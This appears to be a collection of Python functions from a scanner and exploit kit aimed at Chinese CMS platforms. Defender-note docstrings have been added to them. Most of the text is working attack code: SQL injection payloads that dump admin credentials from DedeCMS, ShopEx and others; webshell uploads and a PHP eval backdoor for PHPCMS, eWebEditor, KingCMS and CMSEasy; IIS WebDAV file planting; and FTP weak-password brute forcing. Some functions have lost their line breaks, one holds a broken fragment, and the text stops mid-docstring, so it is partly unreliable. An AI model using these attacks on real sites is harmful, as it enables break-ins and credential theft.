def three(self,arg,path):
    """Check whether ``<path>/plus/long.php`` answers differently from a control URL.

    Two requests go through ``self.request``: one for ``/plus/long.php`` and
    one for a long control file name. If their HTTP status codes differ, the
    first URL is handed to ``yijuhua_cs`` (defined elsewhere; per the original
    comment its arguments are script type, URL, password) and a 7-field
    record is queued on ``url_exp``. Every path returns 0.

    Defender note: the visible indicators are a request for
    ``/plus/long.php`` paired with a request for the control name below, and
    the fixed password string "long".
    """
    try:
        shell_path = path + '/plus/long.php'
        control_path = path + '/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php'
        shell_res = self.request(arg, shell_path)
        control_res = self.request(arg, control_path)
        # A falsy response leaves the corresponding status as None.
        control_status = control_res.status if control_res else None
        shell_status = shell_res.status if shell_res else None
        if shell_status == control_status:
            # Same status for both URLs: nothing is reported.
            return 0
        confidence = 1 if yijuhua_cs("php", arg + shell_path, "long") else 0
        # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
        # type, vulnerability address, password, remark].
        # NOTE(review): 0.5 is the second positional argument of put(); if
        # url_exp is a standard queue that is `block`, not `timeout` - confirm.
        url_exp.put([confidence, self.url0, self.url1, "CN_exp_dedecms_getshell",
                     arg.strip() + shell_path, "long", "webshell"], 0.5)
        return 0
    except Exception:
        return 0
def one(self, arg):
    """POST a UNION-based SQL injection probe to ``<arg>/?product-gnotify``.

    The ``goods[product_id]`` form field carries the injected statement. The
    response body is searched for text wrapped in ``$^`` ... ``^$`` (the
    0x245E / 0x5E24 markers in the statement); exactly one match is queued on
    ``url_exp``. Returns 1 when the request completes, 0 on any exception.

    Defender note: the indicators are a POST to ``/?product-gnotify`` whose
    ``goods[product_id]`` value contains ``union select`` against
    ``sdb_operators``; parameterised queries in the handler remove the issue.
    """
    try:
        url = arg + '/?product-gnotify'
        injected_id = '1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1'
        form = {"goods[goods_id]": '3', "goods[product_id]": injected_id}
        client = httplib2.Http('.cache')
        response, content = client.request(
            url, 'POST', urlencode(form),
            headers={'Content-Type': 'application/x-www-form-urlencoded'})
        leaked = re.findall(r'\$\^(.+)?\^\$', content)
        if len(leaked) == 1:
            # NOTE(review): this record has 8 elements, while the original
            # comment documents 7 fields - confirm what the consumer expects.
            url_exp.put([1, self.url, "bc", "CN_bc_shopex_4_8_5", url,
                         leaked[0], "", ""], 0.5)
        return 1
    except Exception:
        return 0
def scan(self,URL):
    """Send two SQL injection probes to ``<URL>/plus/search.php``.

    Both probes inject through the ``typeArr[...]`` parameter and look for a
    ``Duplicate entry '...' for key`` error message in the page returned by
    ``self.open_url_data``. Each hit is queued on ``url_exp`` under its own
    type label. Returns 0 as soon as ``open_url_data`` returns 0; otherwise
    falls through and returns None. All exceptions are swallowed.

    NOTE(review): the original indentation is lost; the second probe is
    assumed to run regardless of the first probe's result - confirm.

    Defender note: the indicators are ``/plus/search.php`` requests whose
    ``typeArr[`` key contains SQL keywords; the error text shows that the
    application returns raw database errors to the client.
    """
    probes = (
        ("/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\'`+]=a",
         "CN_bc_dedecms_search_php1"),
        ("/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\'`+]=a",
         "CN_bc_dedecms_search_php2"),
    )
    try:
        for query, label in probes:
            page = self.open_url_data(URL + query)
            if page == 0:
                # open_url_data signals failure with 0.
                return 0
            hits = re.findall(r'Error infos: Duplicate entry \'(.*?)\' for key', page)
            if hits:
                url_exp.put([1, self.url, "bc", label, URL + "/plus/search.php",
                             hits[0], ""], 0.5)
    except:
        pass
def find(self, arg):
    """Check whether ``http://<arg>/plus/dst.php`` exists and report it.

    A GET is sent with a Googlebot User-Agent. On HTTP 200 the URL is printed
    and passed to ``yijuhua_cs`` with the password "cmd"; the result decides
    the confidence field (1 or 0) of the record queued on ``url_exp``.
    Returns None normally and False on any exception.

    Defender note: the indicators are requests for ``/plus/dst.php`` carrying
    a Googlebot User-Agent from an address that is not a search-engine
    crawler.
    """
    path = '/plus/dst.php'
    headers = {
        "User-Agent":
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
    }
    # NOTE(review): the connection is never closed.
    conn = httplib.HTTPConnection(arg)
    try:
        conn.request('GET', path, None, headers)
        if conn.getresponse().status == 200:
            data = 'http://%s/plus/dst.php' % arg
            print(data)
            confidence = 1 if yijuhua_cs("php", data, "cmd") else 0
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put([confidence, self.url0, self.url1,
                         "CN_exp_dedecms_yijuhua", data, "cmd", "webshell"], 0.5)
    except Exception:
        return False
def one(self, arg):
    """Probe ``<arg>/uploads/plus/search.php`` for an error-based SQL injection.

    The injected ``typeArr[...]`` key is built to raise a ``Duplicate entry``
    database error. If the response contains one, the matched text is printed
    and queued on ``url_exp`` and 1 is returned; otherwise, and on any
    exception, 0 is returned.

    Defender note: a ``Duplicate entry`` message in the HTTP response means
    database errors reach the client; suppress them and validate the
    ``typeArr`` keys.
    """
    try:
        url = arg + "/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1"
        res = urllib2.urlopen(urllib2.Request(url))
        body = res.read()
        res.close()
        hits = re.findall(r"Duplicate entry \'\w+'", body)
        if not hits:
            return 0
        # The matched error text is stored in the "vulnerability address" slot.
        EXP_list = [1, self.url0, self.url1, "CN_sql_dede_57_sp1X1", hits[0], "", ""]
        print(EXP_list)
        url_exp.put(EXP_list, 0.5)
        return 1
    except Exception:
        return 0
def ewebeditor_asp(self, arg):
    """Upload the local file ``long.asp.cer`` through an eWebEditor upload URL.

    The ``style`` query parameter carries a UNION SELECT against
    ``ewebeditor_style`` that appends ``|cer`` to the image extensions. The
    stored file name is read from the ``parent.UploadSaved('...')`` callback
    in the response, the resulting URL is checked with ``yijuhua_cs``
    (password "long"), and a record is queued on ``url_exp``. Returns None
    normally and 0 on any exception, including a missing callback.

    Defender note: the indicators are ``Upload.asp`` requests with SQL in the
    ``style`` parameter and ``.cer`` files under ``uploadfile/``.
    """
    try:
        url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a"
        # NOTE(review): the file handle is never closed.
        files = {'uploadfile': open("long.asp.cer", "rb")}
        data = requests.post(url, files=files).text
        # First saved file name; IndexError here ends in the except branch.
        name = re.findall(r"parent.UploadSaved\('(.*?)'\)", data)[0]
        url = "%s/jms/edit/uploadfile/%s" % (arg, name)
        confidence = 1 if yijuhua_cs("asp", url, "long") else 0
        # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
        # type, vulnerability address, password, remark].
        url_exp.put([confidence, self.url0, self.url1,
                     "CN_exp_ewebeditor_Upload_asp", url, "long", "webshell"], 0.5)
    except Exception:
        return 0
def getshell(self,arg):
    """POST a PHP snippet to the ``crop_upload`` action of the attachment module.

    The ``file`` parameter points at a ``.Php.JPG`` name followed by encoded
    spaces and ``Php``. When the response is 200 and contains a matching URL,
    that URL is checked with ``yijuhua_cs`` (password "long") and a record is
    queued on ``url_exp``. Returns 1 when no exception occurs, else 0.

    NOTE(review): the original indentation is lost; ``return 1`` is assumed
    to sit at the end of the ``try`` body - confirm.

    Defender note: the indicators are POSTs to
    ``index.php?m=attachment&c=attachments&a=crop_upload`` with a Googlebot
    User-Agent and a ``file`` value ending in mixed-case ``.Php.JPG``.
    """
    try:
        headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
        data="<?php @eval($_POST['long']);?>"
        host = arg.split('//')[1]
        site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php'
        # NOTE(review): the connection is never closed.
        conn = httplib.HTTPConnection(host)
        conn.request('POST',site,data,headers)
        httpres = conn.getresponse()
        html = httpres.read()
        if httpres.status == 200 and html:
            found = re.findall('http://(.*?)\.Php\.JPG\s', html)
            if found:
                data = 'http://'+found[0]+'.Php.JPG%20%20%20%20%20%20%20Php'
                confidence = 1 if yijuhua_cs("php",data,"long") else 0
                # Record layout: [0/1 confidence, main URL, sub URL,
                # vulnerability type, vulnerability address, password, remark].
                url_exp.put([confidence,self.url0,self.url1,
                             "CN_exp_phpcmsv9_getshell",data,"long","webshell"],0.5)
        return 1
    except Exception:
        return 0
def scan(self, arg):
    """Probe ``/plus/carbuyaction.php`` with a ``code=../../<file>%00.php`` value.

    ``arg`` is a ``(url0, url1)`` pair. The file name comes from
    ``self.getcss(url1)`` or falls back to ``index.html``. A 200 response
    with a non-empty body that does not start with ``<html>`` is queued on
    ``url_exp``. Returns None; exceptions from the request are swallowed,
    while the unpacking and ``getcss`` calls sit outside the ``try``.

    Defender note: the indicators are ``carbuyaction.php`` requests whose
    ``code`` parameter contains ``../`` and ``%00``, sent with a
    ``code=alipay`` cookie and a Googlebot User-Agent.
    """
    url0, url1 = arg
    host = url1.split('//')[1]
    # getcss() is called twice, as in the original, when it returns a value.
    if self.getcss(url1):
        css = self.getcss(url1) + '%00.php'
    else:
        css = 'index.html' + '%00.php'
    site = '''/plus/carbuyaction.php?dopost=return&code=../../%s''' % css
    headers = {
        "User-Agent":
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
        "cookie": "code=alipay"
    }
    # NOTE(review): the connection is never closed.
    conn = httplib.HTTPConnection(host)
    try:
        conn.request('GET', site, None, headers)
        httpres = conn.getresponse()
        html = httpres.read()
        if (httpres.status == 200) and (len(html) > 0) and html[:6] != '<html>':
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put([1, url0, url1, "CN_bc_DedeCms_5x",
                         "%s%s" % (url1, site), "", ""], 0.5)
    except:
        pass
def scan(self, arg):
    """Send a percent-encoded ``query`` to ``/search.php`` and look for ``/Style.php``.

    If the search response contains ``shaoxiao``, ``<arg>/Style.php`` is
    fetched; when that page contains ``111222`` it is checked with
    ``yijuhua_cs`` (password "cmd") and a record is queued on ``url_exp``.
    Returns None normally and 0 on any exception.

    Defender note: the indicators are a ``search.php`` request whose
    ``query`` starts with ``shaoxiao%27%3B%3F%3E`` and a new ``Style.php`` in
    the web root.
    """
    url = (arg + '/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53'
           '%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%'
           '27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57'
           '%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%'
           '6C%69%64%3D%31%20%6F%72%20%32%3D%32')
    shellurl = arg + '/Style.php'
    try:
        if 'shaoxiao' not in urllib2.urlopen(url).read():
            return
        if '111222' not in urllib2.urlopen(shellurl).read():
            return
        confidence = 1 if yijuhua_cs("php", shellurl, "cmd") else 0
        # Record layout: [shell check succeeded 0/1, URL, severity,
        # vulnerability type, vulnerability address, password, remark].
        url_exp.put([confidence, self.url, "exp", "CN_exp_kingcms_getshell",
                     shellurl, "cmd", "webshell"], 0.5)
    except Exception:
        return 0
def scan(self, arg):
    """Upload the local file ``long.php;.jpg`` to ``/celive/live/doajaxfileupload.php``.

    The first ``<a href='...'>`` in the response is taken as the stored
    location. If it contains ``.php;.jpg`` it is checked with ``yijuhua_cs``
    (password "long") and a record is printed and queued on ``url_exp``.
    Exceptions are printed and swallowed; the function returns None.

    Defender note: the indicators are multipart uploads to
    ``doajaxfileupload.php`` with a file name containing ``;`` and stored
    files matching ``*.php;.jpg``.
    """
    try:
        opener = urllib2.build_opener(UPLOAD.MultipartPostHandler)
        # NOTE(review): the file handle is never closed.
        params = {"fileToUpload": open("long.php;.jpg", "rb")}
        endpoint = arg + '/celive/live/doajaxfileupload.php'
        html = opener.open(endpoint, params).read()
        ok = re.findall("<a href='(.*?)'", html)
        print(ok)
        if ok and '.php;.jpg' in ok[0]:
            confidence = 1 if yijuhua_cs("php", ok[0], "long") else 0
            # Record layout: [shell check succeeded 0/1, URL, severity,
            # vulnerability type, vulnerability address, password, remark].
            EXP_list = [confidence, self.url, "exp", "CN_exp_etcms_Upload_shell",
                        ok[0], "long", "webshell"]
            print(EXP_list)
            url_exp.put(EXP_list, 0.5)
    except Exception as e:
        print(e)
        pass
def rfid_list(self):
    """Queue one ``http_200`` record on ``url_exp`` for every entry of ``self.list_http``.

    Returns None normally; on an exception the error is printed and 0 is
    returned.
    """
    try:
        for link in self.list_http:
            # Record layout: [shell check succeeded 0/1, URL, severity,
            # vulnerability type, vulnerability address, password, remark].
            url_exp.put([1, self.penurl, "http_200", "http_200", link, "", "http+200"], 0.5)
    except Exception as e:
        print(e)
        return 0
def run(self): MAX_RETRIES = 5 retry = 0 account = None #None=NULL 数组 while self.running and accounts: #list数组 try: self.ftp.connect(Adomain, port) #连接 服务器名 端口号 except Exception, e: if retry <= MAX_RETRIES: #这是为了控制线程吗 retry = retry + 1 #没必要使用这个变量啊 continue #跳过 else: self.running = False #这是 控制线程 break #跳出 #print ".", #重新每三次 为什么一个账户要连接3次 呢 loop_num = 0 while loop_num < 3: loop_num = loop_num + 1 if not account and accounts: #list数组 account = accounts.pop() #list数组 输出 #绝对不要尝试 if not account: #数组无数据了就跳出 break #跳出 #print u'IP:',host,u'用户名:',account[0],u'密码:',account[1] try: self.ftp.login(account[0], account[1]) #连接FTP #没有异常发生,这是一个正确的帐号 # u_data="-CS_linkftp-FTP OK-IP:%s user:%s password:%s time:%s"%\ # (host,account[0],account[1],time.strftime('%Y.%m.%d-%H.%M.%S')) # print u_data EXP_list = [ 1, host, "FTP", "user:"******"", "password:"******"", "", "" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 time.sleep(0.1) account = None #None=NULL self.sql. except Exception, e: emsg = str(e) #调试信息 if 'connection' in emsg.lower( ) or 'tries' in emsg.lower( ): #判断 连接 失败错误信息 不明白何意 retry = retry + 1 break #跳出 else: #reset retry account = None #None=NULL retry = 0
def scan(url,ip,port):
    """Try a TCP connect to ``ip:port`` and report the port when it is open.

    ``connect_ex`` returning 0 is treated as open: a line is printed and a
    record is queued on ``url_exp``. Returns None normally and 0 on any
    exception.
    """
    try:
        # NOTE(review): no timeout is set, and the socket is not closed when
        # an exception is raised before close().
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if sock.connect_ex((ip, port)) == 0:
            print('url:%s IP:%s:%d open' % (url, ip, port))
            # Record layout: [shell check succeeded 0/1, URL, severity,
            # vulnerability type, vulnerability address, password, remark].
            url_exp.put([1, url, "url:port", "socket_port", str(port) + " open", "", ""], 0.5)
        sock.close()
    except:
        return 0
def rfid_list(self):
    """Queue one ``http_200`` record on ``url_exp`` for every entry of ``self.list_http``.

    ``self.penurl`` is indexed as a pair (main URL, sub URL). Returns None
    normally; on an exception the error is printed and 0 is returned.
    """
    try:
        for link in self.list_http:
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put([1, self.penurl[0], self.penurl[1], "http_200", link, "", ""], 0.5)
    except Exception as e:
        print(e)
        return 0
def rfid_list(self):
    """Queue one ``http_download`` record on ``url_exp`` for every entry of ``self.list_download``.

    ``self.penurl`` is indexed as a pair (main URL, sub URL). Returns None
    normally; on an exception the error is printed and 0 is returned.
    """
    try:
        for link in self.list_download:
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put([1, self.penurl[0], self.penurl[1], "http_download", link, "", ""], 0.5)
    except Exception as e:
        print(e)
        return 0
def one2(self,arg):
    """Probe ``<arg>/plus/search.php`` with an encoded ``typeArr[...]`` key.

    The response (5 second timeout) is searched for text inside a large red
    ``<font>`` element; the first match is queued on ``url_exp``. Returns 0.

    NOTE(review): the original indentation is lost; ``return 0`` is assumed
    to close the ``try`` body, so every path returns 0 - confirm.

    Defender note: the ``typeArr`` key contains percent-encoded SQL keywords;
    decode request parameters before matching them in WAF or log rules.
    """
    try:
        html = urllib2.urlopen(arg+'/plus/search.php?keyword=as&typeArr%5B1%20%75%4E%69%6F%6E%201%5D=a',timeout=5).read()
        if html:
            hits = re.findall(r"<font size='5' color='red'>(.*?)</font>", html)
            if hits:
                # Record layout: [shell check succeeded 0/1, URL, severity,
                # vulnerability type, vulnerability address, password, remark].
                url_exp.put([1,self.url,"sql","CN_sql_dede_57_sp1X2",hits[0],"",""],0.5)
        return 0
    except Exception:
        return 0
def for_list(self):
    """Report the first entry of ``self.list`` that ``self.open_url_cms`` accepts.

    Each entry is indexed as ``entry[0]`` and ``entry[1]``; both are passed
    to ``open_url_cms`` together with ``self.URL``. On the first truthy
    result a ``cms`` record carrying ``entry[1]`` is queued on ``url_exp``
    and the loop stops. Returns None normally and 0 on any exception.
    """
    try:
        for entry in self.list:
            if not self.open_url_cms(self.URL, entry[0], entry[1]):
                continue
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put([1, self.url0, self.URL, "cms", entry[1], "", ""], 0.5)
            break  # only the first match is reported
    except Exception:
        return 0
class CS_linkftp(threading.Thread): def __init__(self, openurl): threading.Thread.__init__(self) self.Internet = 10 #控制到300次检测一次网络状态 self.openftp = openurl[7:] #self.Chost="" #主机地址 self.ftp_login(self.openftp) WEAK_USERNAME = [ p.replace('\n', '') for p in open('username.dic').readlines() ] WEAK_PASSWORD = [ p.replace('\n', '') for p in open('password.dic').readlines() ] def get_sdomain(self, domain): #域名拆解www.baidu.com->baidu.com suffixes = 'ac', 'ad', 'ae', 'aero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'arpa', 'as', 'asia', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cat', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'edu', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gov', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'info', 'int', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jobs', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mil', 'mk', 'ml', 'mm', 'mn', 'mo', 'mobi', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'name', 'nc', 'ne', 'net', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om', 'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'pro', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tel', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 'uk', 'us', 'uy', 'uz', 'va', 'vc', 
've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'xn', 'ye', 'yt', 'za', 'zm', 'zw' sdomain = [] bdomain = False for section in domain.split('.'): if section in suffixes: sdomain.append(section) bdomain = True else: sdomain = [section] return '.'.join(sdomain) if bdomain else '' def get_ssdomain(self, domain): #域名拆解www.baidu.com->baidu sdomain = self.get_sdomain(domain) #先解析一道 ssdomian = sdomain.partition('.')[0] if sdomain else '' return ssdomian def ftp_login(self, host, nthreads=10, port=21): #传入名域名开始扫描 #尝试登录 if success return username & password #print u"要扫描IP:",host, #self.A= int(time.strftime('%H%M%S')) try: #是否能链接上FTP ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 except Exception, e: print e return 0 try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户 ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 ftpA.login("anonymous", "") #连接FTP EXP_list = [ 1, host, "FTP", "user:anonymous", "password:"******"", "niming" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 return 0 except Exception, e: pass
def socket_80(self, url):
    """Read the ``Server:`` header of the host on port 80 and report it.

    The host name is resolved, an ``OPTIONS /`` request is sent through
    ``self.socket_sendall`` and the first ``Server:`` line of the reply is
    queued on ``url_exp`` and printed. Returns None normally and 0 on any
    exception, including a reply without a ``Server:`` line.

    Defender note: the request line ends in a bare LF and the ``Host`` header
    carries the resolved IP with no space after the colon, which sets this
    probe apart from ordinary clients.
    """
    try:
        port = 80
        ip = socket.gethostbyname(url)
        request = "OPTIONS / HTTP/1.1\nHost:%s\r\n\r\n" % (ip)
        reply = self.socket_sendall(ip, port, request)
        # First (Server: ..., newline) pair; IndexError ends in the except.
        banner = re.findall(r'(Server:.*?)(\n)', reply)[0][0]
        if banner == "":
            return 0
        # Record layout: [shell check succeeded 0/1, URL, severity,
        # vulnerability type, vulnerability address, password, remark].
        url_exp.put([1, url, "socket_port80", "socket_port80", banner, "", ""], 0.5)
        print("url:%s port80:%s" % (url, banner))
    except:
        return 0
def one(self, arg):
    """Probe ``<arg>/NewsType.asp`` for a UNION-based SQL injection.

    The ``SmallClass`` parameter carries a UNION SELECT that joins two
    columns of ``admin`` with ``CHR(124)`` ("|"). The page returned by
    ``self.open_url_data`` is searched for ``shownews.asp`` link text; if the
    first match contains "|" a record is printed and queued on ``url_exp``.
    Returns 0 when ``open_url_data`` returns 0 or on any exception (including
    no match), else None.

    Defender note: the indicators are ``NewsType.asp`` requests whose
    ``SmallClass`` value contains a quote followed by ``union select``.
    """
    try:
        URL = arg + "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='"
        page = self.open_url_data(URL)
        if page == 0:
            # open_url_data signals failure with 0.
            return 0
        links = re.findall(r'<a.+?href=\\"shownews.asp.+?>(.+?)</a></span>', page)
        if "|" in links[0]:
            # Record layout: [shell check succeeded 0/1, URL, severity,
            # vulnerability type, vulnerability address, password, remark].
            EXP_list = [1, self.url, "bc", "CN_bc_nfsj_jlxt_wrtx",
                        arg + "/NewsType.asp", links[0], ""]
            print(EXP_list)
            url_exp.put(EXP_list, 0.5)
    except Exception:
        return 0
def IIS_webdav(self, url, port=80):
    """Check a host for a writable IIS WebDAV configuration.

    Sends ``OPTIONS /`` over a raw socket and looks for ``DAV`` in the first
    1024 bytes of the reply. If present, ``self.put`` and ``self.move``
    (defined elsewhere; presumably HTTP PUT and MOVE - confirm) are tried and
    each success is queued on ``url_exp``. Always returns 0.

    NOTE(review): the original indentation is lost; the MOVE step is assumed
    to be nested under a successful ``self.put`` - confirm.

    Defender note: the indicators are an OPTIONS request followed by PUT of
    ``/test.txt`` and a MOVE whose ``Destination`` ends in ``.asp;jpg``.
    Disabling WebDAV, or write access for anonymous users, removes the
    exposure.
    """
    try:
        self.txt = '/test.txt'
        # NOTE(review): this socket is never closed.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        remote_ip = socket.gethostbyname(url)
        s.connect((remote_ip, port))
        message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url
        s.sendall(message)
        reply = s.recv(1024)
        if 'DAV' in reply:
            if self.put(url, self.txt):
                # self.txt already starts with "/", so this URL contains "//".
                data = "http://%s/%s" % (url, self.txt)
                EXP_list = [
                    1, url, "exp", "exp_IISwebdav_put", data, "", ""
                ]
                # Record layout: [shell check succeeded 0/1, URL, severity,
                # vulnerability type, vulnerability address, password, remark].
                url_exp.put(EXP_list, 0.5)  # add to the result queue
                MOVE_asp = self.sjzf()  # random file name
                MOVE_asp += ".asp;jpg"
                moveheaders = {
                    'User-Agent':
                    'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
                    'Destination':
                    'http://%s/%s' % (url.strip(), MOVE_asp)
                }
                if self.move(url, self.txt, moveheaders):
                    data = "http://%s/%s" % (url.strip(), MOVE_asp)
                    if yijuhua_cs("asp", data, "long"):  # script type (ASP or PHP), URL, password
                        # check succeeded
                        EXP_list = [
                            1, url, "exp", "exp_IISwebdav_move", data,
                            "long", "webshell"
                        ]
                        url_exp.put(EXP_list, 0.5)  # add to the result queue
                    else:
                        # check failed
                        # NOTE(review): this label has a "UAS_" prefix that
                        # the success branch lacks - confirm which is intended.
                        EXP_list = [
                            0, url, "exp", "UAS_exp_IISwebdav_move", data,
                            "long", "webshell"
                        ]
                        url_exp.put(EXP_list, 0.5)  # add to the result queue
        return 0
    except Exception, e:
        return 0
def scan(self, arg):
    """Test a CMSEasy ``celive`` upload endpoint with the local file ``long.php;.jpg``.

    ``arg`` is a ``(url0, url1)`` pair. If ``self.URL_DZ`` reports ``jpg``
    for the upload URL, a first record is queued, the file is uploaded with
    ``requests`` and the stored name is read from the response. When
    ``self.http_get`` confirms the stored path, it is checked with
    ``yijuhua_cs`` (password "long") and a second record is queued. Returns
    0 when no file name is found or on any exception, else None.

    NOTE(review): the original indentation is lost; the upload is assumed to
    be nested under the ``'jpg' in ...`` check - confirm.

    Defender note: the indicators are uploads to
    ``/celive/live/doajaxfileupload.php`` and files named ``*.php;.jpg``
    under ``/celive/uploadfiles/``.
    """
    try:
        url0, url1 = arg
        data = "%s/celive/live/doajaxfileupload.php" % (url1)
        if 'jpg' in self.URL_DZ(data):  # check whether JPG is supported
            EXP_list = [
                1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", ""
            ]
            # Record layout: [0/1 confidence, main URL, sub URL, vulnerability
            # type, vulnerability address, password, remark].
            url_exp.put(EXP_list, 0.5)  # add to the result queue
            # Upload the file.
            # NOTE(review): the file handle is never closed.
            files = {'fileToUpload': open('long.php;.jpg', 'rb')}
            r = requests.post(data, files=files)
            data = r.text
            name = []
            try:
                p = re.compile(r'target=.+?>(.*?)</a>'
                               )  # e.g. [u'CELIVE-Q7duV0tNj8.php;.jpg']
                sarr = p.findall(data)  # take the first match
                name = sarr[0]
            except:
                return 0
            data = "%s/celive/uploadfiles/%s" % (url1, name)
            if self.http_get(
                    url1.split('//')[1],
                    "/celive/uploadfiles/" + name):  # verify that the address exists
                if yijuhua_cs("php", data, "long"):  # script type (ASP or PHP), URL, password
                    # check succeeded
                    EXP_list = [
                        1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                        "long", "webshell"
                    ]
                    url_exp.put(EXP_list, 0.5)  # add to the result queue
                else:
                    # check failed
                    EXP_list = [
                        0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data,
                        "long", "webshell"
                    ]
                    url_exp.put(EXP_list, 0.5)  # add to the result queue
    except Exception, e:
        return 0
def cmseasy_IIS6_jx(self, url):
    """Test a CMSEasy ``celive`` upload endpoint with the local file ``long.php;.jpg``.

    Per the original comment this targets a CMSEasy file upload combined with
    IIS6 file-name parsing. If ``self.URL_DZ`` reports ``jpg`` for the upload
    URL, a first record (confidence 0) is queued, the file is uploaded with
    ``requests`` and the stored name is read from the response. When
